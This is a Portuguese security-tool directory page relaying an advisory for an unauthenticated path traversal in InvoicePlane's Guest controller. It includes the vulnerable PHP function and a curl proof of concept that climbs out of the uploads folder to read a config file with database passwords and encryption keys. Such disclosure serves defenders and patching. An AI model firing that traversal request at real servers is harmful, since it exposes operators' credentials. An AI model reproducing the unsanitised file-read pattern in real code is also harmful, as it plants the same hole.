Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23491 — CVE-2026-23491 - InvoicePlane tem Path Traversal não autenticado no Guest Controller | Kitploit
Ferramentas/GitHubGitHub/lukasz-rybak/cve-2026-23491
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHublukasz-rybak/cve-2026-23491

CVE-2026-23491

CVE-2026-23491 - InvoicePlane tem Path Traversal não autenticado no Guest Controller

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23491: InvoicePlane tem Path Traversal não autenticado no Guest Controller

Visão Geral

CampoDetalhes
ID do CVECVE-2026-23491
GravidadeCRITICAL
AvisoVer Aviso
Descoberto porLukasz Rybak

Produtos Afetados

  • InvoicePlane/InvoicePlane

Detalhes

Resumo

Existe uma vulnerabilidade de path traversal no método get_file do controller Get do módulo Guest no InvoicePlane v1.6.3. A vulnerabilidade permite que atacantes não autenticados leiam arquivos arbitrários no servidor manipulando o nome do arquivo de entrada. Isso leva à divulgação de informações sensíveis, incluindo arquivos de configuração com credenciais de banco de dados.

Detalhes

A vulnerabilidade está localizada no arquivo application/modules/guest/controllers/Get.php, especificamente dentro da função get_file.

A função aceita um parâmetro $filename diretamente da URL. Ela executa urldecode($filename), mas não sanitiza a entrada para sequências de travessia de diretórios (ex.: ../). O nome de arquivo "sanitizado" é então concatenado com um diretório base ($this->targetPath, que aponta para uploads/customer_files/) e passado para a função readfile().

Trecho do Código Vulnerável:

root@kitploit:~
public function get_file($filename): void
{
    $filename = urldecode($filename);
    if ( ! file_exists($this->targetPath . $filename)) {
        $ref = isset($_SERVER['HTTP_REFERER']) ? ', Referer:' . $_SERVER['HTTP_REFERER'] : '';
        $this->respond_message(404, 'upload_error_file_not_found', $this->targetPath . $filename . $ref);
    }

    // ... headers setting content type and disposition ...

    readfile($this->targetPath . $filename);
}

Como $filename é controlado pelo usuário e não verificado, um atacante pode fornecer uma string como ../../ipconfig.php para escapar do diretório pretendido.

PoC

O seguinte comando cURL demonstra a leitura do arquivo ipconfig.php (que reside dois diretórios acima do diretório padrão uploads/customer_files/):

root@kitploit:~
curl http://localhost/index.php/guest/get/get_file/..%2f..%2fipconfig.php
image

Saída Esperada: O servidor responde com o conteúdo de ipconfig.php, que inclui variáveis de ambiente sensíveis como DB_PASSWORD e ENCRYPTION_KEY.

Impacto

Atacantes podem ler a configuração do aplicativo, o código-fonte e potencialmente outros arquivos do sistema legíveis pelo usuário do servidor web.

Referências

  • https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-88gq-mv54-v3fc
  • https://github.com/InvoicePlane/InvoicePlane/commit/add8bb798dde621f886823065ef1841986543c69

Aviso Legal

Este CVE foi divulgado de forma responsável, seguindo práticas coordenadas de divulgação de vulnerabilidades. As informações aqui fornecidas têm fins exclusivamente educacionais e defensivos.

Baixar ferramenta